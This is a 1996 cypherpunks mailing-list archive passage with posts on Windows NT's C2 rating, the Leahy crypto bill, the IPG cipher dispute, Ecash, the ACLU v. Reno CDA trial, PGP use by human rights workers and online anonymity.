Message-ID: <QQahxy16435.199603210241@relay3.UU.NET>
MIME-Version: 1.0
Content-Type: text/plain


I have  been working for some time on a project that involves doing 
proactive file authorization/authentication under Windows NT.  In the 
process, I've been working on an extension to the Kernel layer of the 
operating system because we need to be able to catch read/writes to 
the disk.  (All perfectly legal according to the DDK, just 
ot documented worth a damn.)  All of this is designed to work 
directly with the functionality given to us by the NT-Security layer.

Basically, I'm now questioning the C2 rating of Windows NT.  The 
entire security layer is  modular to the Kernel.  As a modular 
driver, it can be removed, rewritten, and replaced.   

So, what makes it secure?  What gives it the C2 Rating?  How would 
one go about getting a C2 rating?

Brad




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: owner-cypherpunks@toad.com
Date: Thu, 21 Mar 1996 18:29:00 +0800
Subject: No Subject
Message-ID: <QQahxz18204.199603210259@relay3.UU.NET>
MIME-Version: 1.0
Content-Type: text/plain


----------------------------------------------------------------------------
From:              <Deleted to protect the guilty>
To:               anonymous-remailer@shell.portal.com
Copies to:  cypherpunks@toad.com     
---------------------------------------------------------------------------

Look above, note the "To:" Field, hmmmm, the offending l party mailed a responce 
to an anon remailer.

I have noticed a couple people do this latley.

Please people - THINK, you have just proved beond a shadow of a doubt that you 
are crypto illiterate.

The message is not sent back to the origional sender, it is either qued in the 
remailer's In basket, till the remailer administrator cleans it out, or it is 
trashed upon reciept since it does not have the required Request-Remailing-To: 
format.

*sigh*, I will spare the offending parties the well deserved "Come back when 
you get a clue" flame.
Regards,
Michael Peponis
PGP Key Avalible from MIT Key Server




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jamesd@echeque.com
Date: Thu, 21 Mar 1996 19:06:47 +0800
To: cypherpunks@toad.com
Subject: Re: Keep the pressure! Cryptographers Against Cryptography EXPOSED!
Message-ID: <199603210625.WAA26249@mail1.best.com>
MIME-Version: 1.0
Content-Type: text/plain


At 02:16 AM 3/20/96 -0800, anonymous-remailer@shell.portal.com wrote:
> I am proud to report that
> the majority of us have the good sense to see [the Leahy bill] for 
> what it is but > a few cypherpunks continue to lie to us and have 
> not recanted.

I do not like the Leahy Bill, but it is not so plainly and flagrantly
bad that good people cannot have different opinions of it.
 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: owner-cypherpunks@toad.com
Date: Thu, 21 Mar 1996 11:56:01 +0800
Subject: No Subject
Message-ID: <QQahyb21187.199603210328@relay3.UU.NET>
MIME-Version: 1.0
Content-Type: text/plain


If I were the NSA, I would start threads such as the one on the IPG system.

They are very valuable to them in assessing and mapping the cryptanalysis
capabilities of the CPunks lurkers and regulars members.


Just a thought...

JFA

 Public Key at http://w3.citenet.net/users/jf_avon
    Jean-Francois Avon <jf_avon@citenet.net> 
    2048 bits key ID:C58ADD0D  1996/03/01    
fingerprint=52 96 45 E8 20 5A 8A 5E  F8 7C C8 6F AE FE F8 91 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: owner-cypherpunks@toad.com
Date: Thu, 21 Mar 1996 12:04:25 +0800
Subject: No Subject
Message-ID: <QQahyc22525.199603210341@relay3.UU.NET>
MIME-Version: 1.0
Content-Type: text/plain


At 7:42 PM 3/20/96, Michael Froomkin wrote:
>correct me if I'm wrong, but don't the federal direct mail marketing laws
>say that any unsolicited merchandise sent to a person becomes their
>property, regardless of any disclaimers to the contrary included in the
>package?

The _physical_ item, e.g., a box of soap or a free copy of "Newsweek," but
presumably not the _intellectual property_, e.g, the contents of
"Newsweek."

(Just because I get free samples of magazines does not mean I now can do
with the contents whatever I wish, such as post them on the Net; copyright
law is presumably involved.)

This may be more analogous to what IDG has done.

Disclaimers: IANAL, I am not defending IDG or their "broken in less than
one day" tub of snake oil, nor am I defending copyright and direct mail
marketing laws. And I might be wrong about the intellectual property issue,
though I doubt it. Copyright laws are such that rights are not waived even
if free samples are given out, and so forth. IDG can hardly claim their
algorithm has trade secret status when they've distributed it to many
people. Which leaves them with only trying to enforce copyright
protections, a la the Church of Scientology. Maybe IDG will now seek to
collect the only bucks they'll ever get by suing various Cypherpunks who
are distributing their so-called system? Helena Kobrin can become their
lawyer.

--Tim May

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^756839 - 1  | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Frank Trotter <trotterf@huck.marktwain.com>
Date: Thu, 21 Mar 1996 17:37:49 +0800
To: cypherpunks@toad.com
Subject: Announce: c2 and Ecash
Message-ID: <Pine.BSF.3.91.960320224118.10712C-100000@huck.marktwain.com>
MIME-Version: 1.0
Content-Type: text/plain



Mark Twain Bank Announces 
Fees Waived Access For Community ConneXion 
The World Premier Site for Ecash
******************************************

Ecash - Its Your Money!

Mark Twain Bank is pleased to honor Community ConneXion 
and its customers by providing a special arrangement for 
new accounts.  "Community ConneXion has been a leader in 
providing the Internet community with innovative solutions 
through the C2 site, and in developing solutions such as 
Stronghold: The Apache-SSL-US for secure web traffic," 
commented Frank Trotter, Director of the International 
Markets Division at Mark Twain Bank.  "We wish to provide 
Community ConneXion customers with the best deal available 
for Ecash in recognition of these efforts."

"The pricing we have provided Community ConneXion in this 
promotion, should allow the average participant to utilize 
Ecash without any charges," noted Trotter.  "In addition, 
merchants can benefit from the special arrangements made 
available either directly with Mark Twain Bank, or by 
utilizing the innovative ecash integrated webserver at
Community ConneXion."  

"Ecash is the only private electronic payment system on 
the Internet today. As the Internet Privacy Provider, we 
are happy to support the development and deployment of 
an infrastructure for private electronic commerce," 
commented Sameer Parekh, President of Community 
ConneXion, Inc.

Community ConneXion customers who sign up for 
Ecash from Mark Twain Bank using the automated application 
scripts located on the Community ConneXion site 
(at https://www.c2.org/ecash/application/) will receive 
the following benefits:

For  Schedule 1 Accounts (Basic Consumer):

o    Waive the set up fee    $11.00 until further notice.
o    Waive the monthly fee of $1.00 for 1996.
o    Allow monthly withdrawal of $1,000 from Ecash Mint to 
     WorldCurrency Account without withdrawal fee for 1996.
o    Allow two (2) movements of money from WorldCurrency Access
     to Ecash Mint without additional charge for 1996.

For Merchant Accounts (Schedule 5-8):

o  Waive One Half of the Listed Set Up Fee until further 
   notice.
o  Waive the monthly fee for 1996.

For either consumer or merchant accounts, Community ConneXion 
will verify that you are a C2 customer and securely transmit 
the application directly to Mark Twain Bank.  You remain 
responsible for sending a signed copy of the application 
to Mark Twain, sending money for deposit, and obtaining and 
operating the software as usual.  Other Schedule 1 charges 
that apply from time to time will be retained without 
alteration.

Contacts:
********

Mark Twain Bank

Frank O. Trotter, III
Senior Vice President
Director International Markets Division
Mark Twain Banks
ftrotter@marktwain.com
www.marktwain.com
Fax: +1 314 569-4906

Community ConneXion

Sameer Parekh		Voice:   510-601-9777x3
Community ConneXion, Inc.	FAX:     510-601-9734

---

Ecash is a trademark of DigiCash bv
WorldCurrency is a trademark of Mark Twain Bank





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: owner-cypherpunks@toad.com
Date: Sat, 23 Mar 1996 07:11:18 +0800
Subject: No Subject
Message-ID: <QQahyd23491.199603210350@relay3.UU.NET>
MIME-Version: 1.0
Content-Type: text/plain


At 1:24 AM 03/20/96, IPG Sales wrote:
>Perhaps a battle has been lost, maybe even probably? But the war is not
>over, not by a long shot - with minor modifications this system is
>absolutely secure as events will prove. However, be assured that we
>will not sell our product to anyone until that can be definitively
>established. We greatly appreciate the contribution of some of those on

You used to claim "our system is absolutely safe, we're sure of it, but we
can't tell you the algorithm cause it's secret."  People said that was
stupid, so you finally agreed to show people the algorithm (apparently
sending it to them unsolicited, and then expecting them to be bound to some
sort of non-disclosure agreement?  You might want to hire a lawyer to
familiarize you with how trade secrets work legally, cause they don't work
like you think they work).  The people you showed the algorithm to pointed
out flaws in it.

Now you say "Yeah, okay so there were flaws, but we'll fix them and then it
will be perfect, except you can't see the code or algorithm cause it's
secret."  Sounds like we're back where we started, eh?   No one was willing
to trust the algorithm before without it being reviewed publically.  No one
will be willing to trust it now either, _especially_ after the previous
concerns that the algorithm wasn't secure were _confirmed_.

The cypherpunks list doesn't have to provide free cryptanalysis to you.  I
doubt anyone will want to waste their time looking at  future iterations of
your algorithm, if you deign to show it to them.  The fact that people on
the cypherpunks list don't want to waste their time doing free
cryptanalysis for you doesn't mean that your code is secure, or endorsed by
anyone.  It means that even those who may have thought it possible that
your algorithm was secure after all have given up on that thought, or at
least decided that it's unlikely enough not to be worth much further
consideration, at least until you start behaving reasonably.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: owner-cypherpunks@toad.com
Date: Thu, 21 Mar 1996 12:20:39 +0800
Subject: No Subject
Message-ID: <QQahyd23594.199603210351@relay3.UU.NET>
MIME-Version: 1.0
Content-Type: text/plain


Since someone other than Jim Bell and THE LIST OF SHAME author thought I
was being serious, I thought it wise to respond.

The notion that a measure of criticism from a known enemy, Dorothy
Denning, corrects the many problems with Leahy's legislation is absurd.

As a case in point, remember that Rush Limbaugh, Catharine MacKinnon,
and the radical religious right group American Family Association
criticized the CDA. That does not make the CDA worth passing.

(Of course Rush likes dirtysexycybertalk so he can pick up chicks
online, and the AFA wanted not less, but _more_ liability for ISPs, but
I trust my point is clear.)

Speaking of the CDA, I'll be in Philadelphia tomorrow and Friday for the
hearing. Any other cypherpunks planning to attend?

-Declan



Excerpts from internet.cypherpunks: 20-Mar-96 [NOISE] Re: Dorothy
Denning.. by Alan Bostick@netcom.com 
> In article <Pine.3.89.9603192113.A23263-0100000@well>,
> Declan McCullagh <declan@well.com> wrote:
>  
> > I may have to adjust my position on Leahy's bill. Any legislation that
> > Dorothy Denning attacks so virulently must be worth passing. 
>  
> That could be exactly what They want you to think!
>  
> If They wanted us to overlook the actual flaws and trapdoors in Leahy's 
> bill, what better way than to have our knees jerk in support by arranging
> for Denning's opposition?





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: RUSSELLDH@aol.com
Date: Sat, 23 Mar 1996 04:20:24 +0800
To: cypherpunks@toad.com
Subject: Two "libertarian" interviews...
Message-ID: <960320222654_357360276@emout09.mail.aol.com>
MIME-Version: 1.0
Content-Type: text/plain


to:cypherpunks@toad.com
re: Two "libertarian" interviews...

Hi!

Last month I interviewed Phil Zimmermann, the author of PGP (Pretty Good
Privacy) and last summer, I interviewed Jim Warren about public access to
government information (and vice-versa).  I have transcribed both these
interviews and found your name on the Web as someone who might be interested
in these two items.  

The Zimmermann interview is at:
http://www.animatedsoftware.com/hightech/philspgp.htm
and the Jim Warren interview is at:
http://www.animatedsoftware.com/hightech/jimwarre.htm

I hope you will find these interviews interesting and will want to link to
them.  Thank you in advance for your consideration.

Russell Hoffman
Host,
High Tech Today




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: owner-cypherpunks@toad.com
Date: Thu, 21 Mar 1996 12:30:19 +0800
Subject: No Subject
Message-ID: <QQahye25133.199603210408@relay3.UU.NET>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 20 Mar 1996, Jim McCoy wrote:

> What amuses me most about this series of rantings by whomever, other
> than the paranoid and baseless claims made by the anonymous poster,
> is the number of people who have been complaining about the author doing
> so anonymously through a remailer.  The irony of such a situation is
> too rich to pass up.
> 
> It seems that cypherpunks can dish it out when other newsgroups and
> mailing lists suffer such problems ("well, the remailers do nothing
> that telneting to port 25 cannot do..." or "internet identity is such
> a fiction anyway, get used to it"  seem to be common responses), but
> when the cypherpunks lists is the victim of unpleasant anonymous messages
> we fall back to the tired refrain of "if you have nothing to hide why
> are you posting anonymously."  How sad.
> 
> So, why the hypocrisy here?

I don't see this as hypocrisy. Hypocrisy would be trying to track the guy
down, or turning off the remailer, or filtering anonymous rants at
toad.com. I think it's completely legitimate, and healthy, to question
why people go anonymous while supporting their right to do so. Sometimes
anonymity is necessary, sometimes it's just for fun, sometimes its
cowardice, sometimes it's deception. 

Your point about "stop whining and write code for anonymous reputations"
is misplaced.  Such code ALREADY EXISTS. There are lots of nyms out there
with PGP keys. If you're already PGP-encrypting your message to send it
to an anonymous remailer securely, it's really no more trouble to sign it
with the key for Alice D'Anonymous. If you don't feel secure using PGP 
(and "the real Alice" did have some -- some -- valid points), then use a 
magic number or serialize your messages. It worked for the Unabomber.

-rich




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: owner-cypherpunks@toad.com
Date: Thu, 21 Mar 1996 18:56:53 +0800
Subject: No Subject
Message-ID: <QQahye24948.199603210408@relay3.UU.NET>
MIME-Version: 1.0
Content-Type: text/plain


Read on for more information on the details of the court challenge.

I'm very happy to know that Donna Hoffman and Howard Rheingold will be
testifying. They and other ACLU/CIEC witnesses and plaintiffs have been
deposed by the DoJ over the last two weeks in Washington, DC. During the
weeks separating the two sets of hearing dates, we will be deposing
witnesses that the DoJ plans to call. I would expect those witnesses to
dispute, among other things, the effectiveness of filtering software and
other forms of indecency-blocking. 

-Declan



// declan@eff.org // I do not represent the EFF // declan@well.com //



March 20, 1996

_________________________________________________________________
News from the ACLU National Headquarters


                 ACLU V. RENO:  Background Briefing
                                  
              Three-Judge Panel to Hear ACLU Testimony in 
           Landmark Challenge to Internet Censorship Law
                                                                    
PHILADELPHIA, PA--Beginning tomorrow, a three-judge panel in
federal district court in Philadelphia will hear testimony in the
consolidated cases of ACLU et al v. Reno and American Library
Association et al v. Reno, the landmark challenge to censorship
provisions of the Telecommunications Law of 1996. 

Free speech in cyberspace is at stake as the first major legal
challenge to censorship on the Internet gets underway.  The case began
when the ACLU filed a motion for a temporary restraining order against
indecency provisions of the Telecommunications Bill immediately after
it was signed into law by President Clinton on February 8.  The suit
challenges provisions of the law that criminalize making available to
minors "indecent" or "patently offensive" speech.  

Acting on behalf of 20 individuals and organizations that provide
information via the Internet -- including itself -- the ACLU said it
was moving quickly because it feared that the telecommunications
legislation would have an immediate impact on the Internet.  

Following this action, a second legal challenge was filed on
February 26 by a coalition of more than 20 corporate and trade
organizations known as the Citizens Internet Empowerment Coalition
(CIEC).  The CIEC suit, organized by the American Library Association,
America Online and the Center for Democracy and Technology, was
formally consolidated  with ACLU v. Reno.  

The CIEC lawsuit, which addresses essentially the same issues as
the ACLU challenge, further illustrates the broad spectrum  of
individuals and organizations that would be affected by the censorship
provisions, and strengthens the case for a finding that the law is
unconstitutional.  


The Court Case 

According to procedures laid out by the judges, direct testimony
in ACLU v. Reno is to be submitted via affidavit.  During the three
days of testimony allowed, which will take place over March 21 and 22
and April 1, lawyers for the Department of Justice will cross-examine
coalition witnesses, after which lawyers for the ACLU and ALA
coalitions will have an opportunity to redirect, i.e., question their
witnesses in response to the government's cross-examination.

In preparation for the case, lawyers for the Department of Justice
have been deposing all the ACLU and CIEC witnesses it may choose to
cross-examine.  So far, government lawyers have declined to cross-
examine only two witnesses: Christine Soto and Hunter Allen, teenagers
whose affidavits attest to the importance of uncensored access to the
Internet by minors.  

The government is scheduled to present its witnesses for cross-
examination on April 11 and 12, 1996.  A fourth day of testimony has
been scheduled for April 26, to allow the ACLU and ALA coalitions to
present witnesses rebutting the government's testimony.   Following
these six days of trial,  the judges will issue a ruling.  Depending
on the outcome, either side may seek an appeal to the U.S. Supreme
Court.   


The Witnesses

Thursday, March 21:
--Scott  O. Bradner, senior technical consultant, Information Technology
Services, Harvard University (ALA)
--Ann W. Duvall, president, SurfWatch Inc.  (ALA)
--Patricia Nell Warren, author and publisher, WildCat Press (ACLU)

Friday, March 22
--Donna Hoffman, associate professor of management, Owen Graduate School
of Management, Vanderbilt University (ACLU)
--William Stayton, psychologist and Baptist minister (ACLU)
--Robert B. Cronenberger, director, Carnegie Library of Pittsburgh
Professor (ALA)
--Kiyoshi Kuromiya, director, Critical Path AIDS Project (ACLU)

Monday, April 1
--Howard Rheingold, author and cyberspace expert
--Barry Steinhardt, associate director, ACLU 
--Stephen Donaldson, Stop Prisoner Rape

(*Note: schedule is subject to change)


Chronology

February 7
-- At a news conference in Washington, D.C., the ACLU announces plans
to seek a temporary restraining order against indecency provisions of
the Telecommunications Bill immediately after it is signed into law
by President Clinton on February 8.  
--The ACLU announces the launch of its new "Freedom Network" World
Wide Web site, <http://www.aclu.org>, with a home page declaring,
"Keep Cyberspace Free."  Over 200,000 hits are recorded in the first
48 hours of the launch. 

February 8
--The ACLU files its legal challenge in federal district court in
Philadelphia before Judge Ronald L. Buckwalter.  
-- In the first court action over the constitutionality of the
Communications Decency Act , Judge   Buckwalter directs the government
to refrain from prosecuting for so-called indecent or patently
offensive material online until the motion for a TRO is decided.
-- The judge instructs the government to file a reply brief to the
ACLU's request for a TRO within one week.  
--Government lawyers conceded that the abortion speech restrictions
of the CDA are unconstitutional.  

February 15
-- Judge Buckwalter grants a temporary restraining order on the
indecency provisions of  the Communications Decency Act, and denies
the TRO motions on prosecution for "patently offensive material" and
on the "Comstock Law" abortion speech provisions of the CDA.  
--A three-judge panel is convened to hear the case: Chief Judge
Dolores K. Sloviter, Judge Stuart Dalzell, and Judge Ronald L.
Buckwalter.

February 21
--More than 5,000 visitors to the ACLU website use the "instant action"
feature to e-mail or fax Attorney General Janet Reno, urging her not
to prosecute under the new law.   

February 23
 -- ACLU announces that government lawyers have agreed not to initiate
investigations or prosecute Internet "indecency" until three-judge
court rules on the case.
--Hearing dates set for the case; the ACLU will present its evidence
on March 21 and 22, with April 1 reserved.  The government's dates 
are April 11 and 12, 1996.  The total trial is scheduled to last five days. 

February 26
--More than 20 corporate and trade organizations, known as the Citizens
Internet Empowerment Coalition (CIEC),  initiate a second legal
challenge to the Communications Decency Act.  

February 27
--The CIEC suit, organized by the American Library Association, America
Online and the Center for Democracy and Technology, is formally
consolidated  with ACLU v. Reno.  

March 21  
--Trial opens at 9:30 a.m. in the ceremonial courtroom in federal
district court in Philadelphia.  
 
                                 ###

Contact: Emily Whitfield, (212) 944-9800 ext.426

_________________________________________________________________
Media Relations Office 132 W 43rd Street, NYC 10036 (212) 944-9800 ext. 414







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Erik E. Fair"  (Time Keeper) <fair@clock.org>
Date: Thu, 21 Mar 1996 20:28:01 +0800
To: jim bell <jimbell@pacifier.com>
Subject: Re: Dorothy Denning attacks Leahy's crypto bill
Message-ID: <v02140b04ad76ca8569ef@[204.94.116.246]>
MIME-Version: 1.0
Content-Type: text/plain


I feel a bit stupid right now. I read Leahy's bill from top to bottom
shortly after it was submitted, and aside from the provision which
separately criminalizes the use of encryption in a the comission of a crime
or to obstruct justice, I fail to see the flaws that you see.

Could you spend a little time enumerating the flaws in this bill as you see
them, with reference to the particular wording in Leahy's bill?

thanks for your time & trouble,

Erik Fair






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Thu, 21 Mar 1996 18:18:02 +0800
To: cypherpunks@toad.com
Subject: Re: If you can't take the heat...  (Was Re: Keep the pressure!)
Message-ID: <ad762a58060210043b19@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 8:54 PM 3/20/96, Jim McCoy wrote:

>It seems that cypherpunks can dish it out when other newsgroups and
>mailing lists suffer such problems ("well, the remailers do nothing

I think that using the language "it seems that cypherpunks..." is too
all-inclusive. Not many of us have complained, fortunately, about the
anonymous posts, and I know of no votes or other opinion polls.

A better wording might be "It seems that some cypherpunks..." Even better,
"some members of the list...."

There are something like 1000 list subscribers. A handful of vocal folks
are critical of uses of anonymity. Not surprising, given our diversity.

And since the "traitor list" is so childish, regardless of being written
anonymously or not, it is unlikely that many people will jump up and claim
to be impressed. Thus, it is unsurprising that the comments that _have_
been heard tend to be about one of the few things that can be immediately
recognized: the anonymous (and to some, "cowardly") nature of the charges.

And I think the anonymity issue is interesting. In the past, Detweiler
railed against the uses of anonymity while himself being the single most
prolific user of anonymous insults and the like, so it's an interesting
pathology to study.

While I personally trash the "traitor list" posts from Mr. Anonymous, I
also trash similar rants from non-anonymous persons.


>that telneting to port 25 cannot do..." or "internet identity is such
>a fiction anyway, get used to it"  seem to be common responses), but
>when the cypherpunks lists is the victim of unpleasant anonymous messages
>we fall back to the tired refrain of "if you have nothing to hide why
>are you posting anonymously."  How sad.

"We" fall back on this tired refrain? Again, only a handful (no more than
5) have denounced this use of anonymity, which leaves hundreds of others
who have said nothing of the kind.


--Tim May

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^756839 - 1  | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "David K. Merriman" <merriman@arn.net>
Date: Thu, 21 Mar 1996 18:25:51 +0800
To: cypherpunks@toad.com
Subject: MS self-generated X.509 validity?
Message-ID: <2.2.32.19960320174659.00687e44@arn.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

I've just had a chance to go through the SDK MS is giving away for their
ActiveX package. Interestingly, there's a little utility included for
generating X.509 certs. The read.me that is included claims that the certs
so generated don't have any real validity, as they're not linked to anything
in the known universe (paraphrasing :-).

My question is, is this an otherwise usable cert? I'll be happy to give
anyone interested a copy of the files (shellback.cer and shellback.spc) I
generated, if they'd like to examine/validate them.

If the certs are, in fact, valid, I'll be glad to make the program available
to others for 'testing purposes'.

Dave Merriman

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMVAn/MVrTvyYOzAZAQERywP+IMBiiAEGkBNI88kuw2WRlYfEOsAD92fl
mfNpiJmb0pYTzljE1PVtLNjLtrXkeu71fTYX34rC90aU7zD/nufmZz+Nrp6TR1Ce
J39A9C5KR7rkNRxvsjOnpyZ1gEHCsOh6ceGVUZidYa+iEvVs20VrlMleS2nz3t6w
4piJt0Bhwqc=
=o+LF
-----END PGP SIGNATURE-----
-------------------------------------------------------------
"Giving money and power to government is like giving 
whiskey and car keys to teenage boys."
                    P. J. O'Rourke (b. 1947), U.S. journalist.
<><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><>
http://www.shellback.com/personal/merriman/index.htm






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Philip Zimmermann <prz@acm.org>
Date: Thu, 21 Mar 1996 19:30:31 +0800
To: cypherpunks@toad.com (Cypherpunks)
Subject: PGP and Human Rights, continued
Message-ID: <199603210715.HAA09123@maalox>
MIME-Version: 1.0
Content-Type: text


A few days ago, I posted a note to the cypherpunks list from a human
rights group in Central Europe, regarding their use of PGP.  Here
is a followup note from the same guy.  I have edited it to preserve
his and his group's anonymity.  This version may be freely circulated.

  -Philip Zimmermann

Date: Tue, 19 Mar 1996 10:35:00 +0000 (GMT)
>From: [name and email address deleted]
Subject: New Message from Europe
To: prz@ACM.ORG


I hope our story helps. Here is a little tale of pre-PGP days.

In the bad old days before we had PGP and before the revolution in 
Romania, we used to send couriers to Romania to meet with dissidents and 
help collate information about their troubles.

Organisings such trips was a nightmare because briefing couriers to be 
able to find people, and then bring out accurate reports was quite 
difficult. Any document was liable to be confiscated, and any notebook 
with names and addresses would be taken if found by the Police and every 
Romanian in the book would be visited by the security Police. Yet 
sometimes we would be given large files of documents to take to the 
Human Rights Agencies in the West, and couriers would have to visit 
several dissidents.

As Foreigner's you were required to stay in designated hotels, it was 
illegal to stay in a private home. You were followed, and meetings with 
dissidents were a stressful experience for everyone.

We eventually started to use handheld psion computers to carry 
information about travel directions, name and addresses, and to input 
files etc. No sensitive information was carried in the memory of the 
psion but in a separate memory cartridge. The cartridge resembled a 
battery, and the psion looked like a sophisticated calculator, so we 
relied on the Romanians ignorance of that technology, and on keeping the 
two items separate when travelling.

This worked very well until the late eighties when a courier was 
arrested at the Romanian\Hungarian border, during the initial search the  
memory cartridge was overlooked, and as such the courier was able to 
keep the memory cartridge. Later in the day, he was being walked between 
two buildings when he had opportunity to throw the memory cartridge into 
a fast moving river ! All very heady stuff, but everyone back in the 
office was off the wall for several days until the courier was 
eventually released and able to confirm the destruction of the memory 
cartridge.

Since PGP, we have been able sleep better at nights.

The following story is not for publication as we could easily be 
identified... [story deleted]

...

So as you can see the issue of Privacy here is not about tax evasion or 
child pornography, but the on-going determination by various groups 
including parts of the media, and Government Agencies, to know 
everything and to then to profit by such knowledge financially or by the 
destruction of those opposed to them.

In this part of the world PGP is a common sense idea that protects 
ordinary people from those who have power that they are prepared to 
abuse. There is no Constitution, enforced by capable courts in this part 
of the world able to protect us from such abuses, so we must have the 
right to protect ourselves from abuse.

If the NSC considers PGP a restricted weapon system that can't be 
legally exported, why can't at least Americans who have the right to 
bear arms have an ongoing guaranteed right to keep uncompromised 
encryption\PGP under their pillow at night along with their magnum. If 
you are allowed fatal force to protect your physical person, why can't 
you have equally powerful protection for your personal thoughts.

Now I am no fan of the Gun Lobby, but if Americans can ensure their 
right to uncompromised encryption, the rest of us can argue for the same 
more effectively.

Anyway I must get back to work...

Do keep in touch sometimes..

Best regards

[name deleted]
---




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Steve Gibbons <steve@aztech.net>
Date: Sat, 23 Mar 1996 04:20:05 +0800
To: cypherpunks@toad.com
Subject: RE: [NOISE] Re: IPG message
Message-ID: <0099FA44.AAEFE920.98@aztech.net>
MIME-Version: 1.0
Content-Type: text/plain


The exchange between IPG and CypherPunks sounds more and more like a
Troll every time I see a new message on the subject.  (My 'D'elete key is
starting to wear out from over-use...)

[ Yes, I realize that this post is just _more_ noise... ]

--
Steve@AZTech.Net




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Sat, 23 Mar 1996 04:20:23 +0800
To: abostick@netcom.com (Alan Bostick)
Subject: Re: [NOISE] Re: Dorothy Denning attacks Leahy's crypto bill
Message-ID: <m0tzfbg-00091AC@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 03:35 PM 3/20/96 -0500, Perry E. Metzger wrote:
>
>Alan Bostick writes:
>> Declan McCullagh <declan@well.com> wrote:
>> 
>> > I may have to adjust my position on Leahy's bill. Any legislation that
>> > Dorothy Denning attacks so virulently must be worth passing. 
>> 
>> That could be exactly what They want you to think!
>
>Oh, God. This is really a bit too much, don't you think?
>
>I mean, its obvious that, whatever its flaws, passage of the Leahy
>bill would be very bad for the export control droids.

I disagree, strongly.  "Export controls" are worthless against the major characters they CLAIM they are intended to be directed at:  "Terrorists, drug dealers, pornographers, etc."  They'll get good crypto regardless, either from foreign sources or "illegal" export that happens anyway.  The main attraction of export controls (to the govt) is that if they had been played "well," the government might have been able to foist some sort of Clipper-system on us indirectly, by building up a domestic market for crypto that is designed to be incompatible with the rest of the world, because nobody would buy the exports anyway.  It didn't work, of course, but the Feds are still flailing away, trying to control the situation.

In addition, the government really has no choice but to relax export controls, because of industry pressure.  The result, I think, is that the Leahy bill does little or nothing for us that wouldn't otherwise happen in the next year.  If that's the case, we win nothing and we compromise away our rights.


> Has it occurred to you that the whole thing might not be a conspiracy and that the
>flaws in the bill might just be that -- flaws?
>Perry

This theory is easily testable.  As I suggested a LONG time ago (gee, it must be at least a week now!) let's have a go at re-writing the bill to delete all the bad parts, modify it to be good, add appropriate extras to nail down everything, and present it to Leahy as the minimum acceptable bill.  If those are just "flaws" then Leahy should have no trouble with any of this.  If, on the other hand, it's all a fraud, we'll encounter fierce resistance.

What do you think will happen?

Jim Bell
jimbell@pacifier.com  




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dirsec <unicorn@schloss.li>
Date: Thu, 21 Mar 1996 18:14:40 +0800
To: "Timothy C. May" <tcmay@got.net>
Subject: Re: unsubsrcribe
In-Reply-To: <ad760a7105021004bc29@[205.199.118.202]>
Message-ID: <Pine.SUN.3.91.960321005043.14126C-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 20 Mar 1996, Timothy C. May wrote:

> At 4:00 AM 3/21/96, thrdina@ibm.net wrote:
> >How can I unsubsribe from this mailing list?
> >
> >
> >From: THOMAS HRDINA
> >      Manager - Networks
> >      Bank of Nova Scotia
> >      New York Agency
> 
> Well, do you want to "unsubsrcribe" or "unsubsribe"?

[...]

> (Remind me not to open an account at this "Bank of Nova Scotia.")

I'd think a better idea would be to open an account in the amount of US$ 
10.00 and wait a few months.  You'll probably find a bank error has given 
you US$ 1000.00

> 
> --Tim
> 

---
My prefered and soon to be permanent e-mail address: unicorn@schloss.li
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: owner-cypherpunks@toad.com
Date: Thu, 21 Mar 1996 14:16:01 +0800
Subject: No Subject
Message-ID: <QQahyl05049.199603210559@relay3.UU.NET>
MIME-Version: 1.0
Content-Type: text/plain


A friend of mine registered as a student for the CFP '96 conference
next week, but is unable to go.  Registration is transferable, so he
